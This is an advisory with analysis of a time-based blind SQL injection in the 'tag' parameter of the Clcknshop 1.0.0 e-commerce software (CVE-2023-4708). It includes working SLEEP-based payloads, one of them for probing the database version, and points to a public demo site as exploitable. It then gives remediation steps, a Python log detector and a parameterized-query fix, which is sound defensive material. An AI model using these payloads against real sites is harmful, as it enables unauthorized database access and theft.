Clcknshop 1.0.0 - SQL Injection

Exploit Author: CraCkEr
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-10-09
# Exploit Title: Clcknshop 1.0.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 16/08/2023
# Vendor: Infosoftbd Solutions
# Vendor Homepage: https://infosoftbd.com/
# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/
# Demo: https://kidszone.clckn.shop/
# Version: 1.0.0
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4708
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data and modification of
data, and can crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /collection/all

GET parameter 'tag' is vulnerable to SQL Injection

https://website/collection/all?tag=[SQLi]

---
Parameter: tag (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---


Clcknshop 1.0.0 – SQL Injection Vulnerability Analysis (CVE-2023-4708)

Clcknshop 1.0.0, a multitenancy e-commerce solution developed by Infosoftbd Solutions, has been identified as vulnerable to a critical SQL Injection flaw. This vulnerability, discovered by security researcher CraCkEr on August 16, 2023, affects the collection/all endpoint and allows attackers to exploit the tag parameter through a time-based blind SQL injection technique.

Overview of the Vulnerability

The vulnerability lies in the way the application processes user input via the GET parameter tag. When an attacker sends a crafted payload through this parameter, the application fails to sanitize or validate input, leading to direct execution of malicious SQL queries. This flaw falls under multiple CWE classifications:

  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
  • CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
  • CWE-707: Improper Neutralization

With CVE-2023-4708 assigned, this vulnerability is recognized as a high-risk security issue because it can compromise both the integrity and the confidentiality of the database.

Attack Vector: Time-Based Blind SQL Injection

The exploit leverages a time-based blind SQL injection technique, which is particularly effective when the application does not return direct error messages or query results. Instead, the attacker measures the response time to infer whether a condition is true or false.

Here’s the payload used in the exploit:

tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z

Explanation:

This payload exploits MySQL’s SLEEP() function, which pauses execution for a specified number of seconds. The injection works as follows:

  1. The tag parameter is set to tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z.
  2. The SQL query is constructed as: SELECT * FROM products WHERE tag = 'tshirt' XOR (SELECT 0 FROM (SELECT SLEEP(6)) a) XOR 'Z'.
  3. If the SLEEP(6) function executes, the server response will take approximately 6 seconds to return.
  4. If the function is not executed (e.g., due to a syntax error or failed condition), the response time remains normal.

By measuring the delay, an attacker can determine whether the SQL query condition is true, enabling them to extract information from the database bit by bit.

Real-World Implications

Consider a scenario where an attacker aims to discover the database version:

tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6))WHERE(VERSION()LIKE'5%'))a)XOR'Z

Upon sending this payload, a 6-second delay in the server's response confirms that the version string begins with 5, that is, a MySQL 5.x release; a normal response time indicates it does not.

Attackers can use this method to:

  • Enumerate database tables
  • Extract usernames and passwords
  • Modify product listings or pricing
  • Perform data exfiltration via time-based queries

Such actions can lead to financial loss, data breaches, and reputational damage—especially for an e-commerce platform handling sensitive user data.

Impact and Risk Assessment

| Impact            | Severity | Exploitability                        |
|-------------------|----------|---------------------------------------|
| Database Access   | High     | High (no authentication required)     |
| Data Theft        | High     | Medium (requires time-based probing)  |
| Application Crash | Medium   | Low (if SLEEP is abused excessively)  |

Given that the demo site https://kidszone.clckn.shop/ is publicly accessible, this vulnerability is not only theoretical but exploitable in real-world environments.

Remediation and Best Practices

Developers and administrators must implement the following defensive measures:

  • Input Validation: Ensure all user inputs (like tag) are sanitized and validated against a predefined list of allowed values.
  • Parameterized Queries: Use prepared statements or ORM frameworks to prevent direct SQL injection.
  • Rate Limiting: Implement rate limiting on endpoints to detect and block excessive time-based probing.
  • Logging & Monitoring: Enable detailed logging of SQL queries and monitor for suspicious patterns.
  • Security Testing: Conduct regular penetration testing and use tools like SQLMap to detect such vulnerabilities.
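As an added example (not part of the advisory or of this analysis), the following Python script shows how the Logging & Monitoring and Rate Limiting points above can be put into practice on the web server side. It parses constructed access-log lines in an assumed nginx-style format with the request time appended, inspects the tag parameter of requests to /collection/all, flags values that carry SQL syntax, flags responses slower than an assumed 5-second threshold (the SLEEP(6) probe from the advisory shows up as a roughly 6-second response), and counts flagged requests per client address so that a rate limit or block can be applied. The log lines, the log format and the threshold are constructed for this example; the function names are mine.

```python
"""Detect time-based SQL injection probing of /collection/all in web server access logs."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed log format (constructed for this example; nginx combined format with $request_time appended):
# <ip> - - [<time>] "<method> <target> <proto>" <status> <bytes> <request_time_seconds>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rtime>\d+(?:\.\d+)?)$'
)

# SQL keywords and metacharacters that have no business in a value that should be a plain tag slug.
SQLI_TOKENS = re.compile(r"(?i)\b(?:sleep|benchmark|select|union|xor|or|and|waitfor)\b|['\";()=]")

SLOW_SECONDS = 5.0  # assumed threshold: the catalogue page normally answers in well under a second


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["rtime"] = float(rec["rtime"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes once; unquote again so double-encoded payloads are inspected too.
    rec["params"] = {
        k: [unquote(v) for v in vs]
        for k, vs in parse_qs(parts.query, keep_blank_values=True).items()
    }
    return rec


def score_tag(value):
    """Return the distinct SQL-like tokens found in a tag value (empty list for a clean slug)."""
    return sorted({t.lower() for t in SQLI_TOKENS.findall(value)})


def analyze(lines):
    """Return (alerts, probes_per_ip) for requests to /collection/all whose tag looks like a probe."""
    alerts = []
    probes_per_ip = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != "/collection/all":
            continue
        for value in rec["params"].get("tag", []):
            tokens = score_tag(value)
            slow = rec["rtime"] >= SLOW_SECONDS
            if tokens or slow:
                probes_per_ip[rec["ip"]] += 1
                alerts.append({
                    "ip": rec["ip"], "time": rec["time"], "tag": value,
                    "tokens": tokens, "slow": slow, "rtime": rec["rtime"],
                    # SQL syntax plus a delay matching the injected SLEEP is the strongest signal
                    "severity": "high" if (tokens and slow) else "medium",
                })
    return alerts, dict(probes_per_ip)


# Constructed sample log: one benign request per client, two probes (the advisory's payloads) from one client.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Aug/2023:10:01:02 +0000] "GET /collection/all?tag=tshirt HTTP/1.1" 200 5120 0.031',
    '203.0.113.7 - - [16/Aug/2023:10:01:09 +0000] "GET /collection/all?tag=tshirt%27XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR%27Z HTTP/1.1" 200 4870 6.042',
    '203.0.113.7 - - [16/Aug/2023:10:01:17 +0000] "GET /collection/all?tag=tshirt%27XOR(SELECT(0)FROM(SELECT(SLEEP(6))WHERE(VERSION()LIKE%275%25%27))a)XOR%27Z HTTP/1.1" 200 4870 6.051',
    '198.51.100.4 - - [16/Aug/2023:10:02:00 +0000] "GET /collection/all?tag=kids HTTP/1.1" 200 6010 0.028',
    '198.51.100.4 - - [16/Aug/2023:10:02:30 +0000] "GET /product/123 HTTP/1.1" 200 3300 0.020',
]

if __name__ == "__main__":
    found, per_ip = analyze(SAMPLE_LOG)
    for a in found:
        print(f"{a['severity']:6} {a['ip']} {a['rtime']:.3f}s tokens={a['tokens']}")
    print("flagged requests per client:", per_ip)
```

In production the per-client counter would feed a rate limiter or WAF rule, and the slow-response signal is worth alerting on even when the payload is obfuscated beyond the keyword list, because the delay is the one thing a time-based probe cannot hide.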

For Clcknshop 1.0.0 specifically, the vendor should:

  • Release a patch to sanitize the tag parameter
  • Update documentation with security guidelines
  • Apply strict input filtering for all GET parameters
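As an added example (not the vendor's code), the following Python snippet places the vulnerable query pattern beside the hardened one that the remediation list calls for: a strict allowlist for the tag value followed by a parameterized query. It uses sqlite3 as a stand-in for the MySQL backend, an assumed slug format for tags, and the payload from the advisory as test input; the names validate_tag, find_products and build_query_unsafe are mine. In the PHP code base the same binding is done with PDO prepare() and execute().

```python
"""Vulnerable versus hardened handling of the 'tag' GET parameter (sqlite3 stands in for MySQL)."""
import re
import sqlite3

# Assumed policy for this example: tags are slugs of lowercase letters, digits and hyphens, 1-40 chars.
TAG_RE = re.compile(r"^[a-z0-9-]{1,40}$")

# Payload quoted from the advisory, used here only as test input for the defences below.
PAYLOAD = "tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z"


def validate_tag(tag):
    """Allowlist check: return the tag if it is a plain slug, else None."""
    return tag if TAG_RE.fullmatch(tag) else None


def build_query_unsafe(tag):
    """The vulnerable pattern: the raw parameter is interpolated into the SQL text.

    With the advisory payload the closing quote ends the literal early and the rest
    of the parameter becomes SQL that the database executes.
    """
    return f"SELECT id, name FROM products WHERE tag = '{tag}'"


def find_products_param_only(conn, tag):
    """Parameter binding alone: the value is sent separately from the SQL text, so it can
    only ever be compared as a string, never parsed as SQL."""
    return conn.execute("SELECT id, name FROM products WHERE tag = ?", (tag,)).fetchall()


def find_products(conn, tag):
    """The hardened pattern: reject anything that is not a slug, then bind the value."""
    if validate_tag(tag) is None:
        return []
    return find_products_param_only(conn, tag)


def make_demo_db():
    """In-memory catalogue with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, tag TEXT)")
    conn.executemany(
        "INSERT INTO products (name, tag) VALUES (?, ?)",
        [("Kids T-Shirt", "tshirt"), ("Baby Cap", "cap"), ("Sun Hat", "hat")],
    )
    return conn


if __name__ == "__main__":
    conn = make_demo_db()
    print("unsafe SQL text:", build_query_unsafe(PAYLOAD))
    print("validate_tag(payload):", validate_tag(PAYLOAD))
    print("bound query, payload as literal:", find_products_param_only(conn, PAYLOAD))
    print("hardened lookup, 'tshirt':", find_products(conn, "tshirt"))
```

The allowlist is the cheap first line: it rejects the payload before any database call and also stops the probe-and-measure loop that a time-based attack depends on. The parameterized query is the actual fix, since it holds even for parameters whose legitimate values cannot be described by a simple pattern.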

Conclusion

SQL injection remains one of the most prevalent and dangerous web vulnerabilities. The Clcknshop 1.0.0 case exemplifies how a seemingly simple input parameter can become a gateway to full database compromise. As cyber threats evolve, developers must prioritize security by design—especially in e-commerce systems where data integrity and confidentiality are paramount.

Security researchers and ethical hackers like CraCkEr, MoizSid09, and 0x0CryptoJob play a vital role in identifying and reporting such flaws, helping vendors strengthen their products before malicious actors exploit them.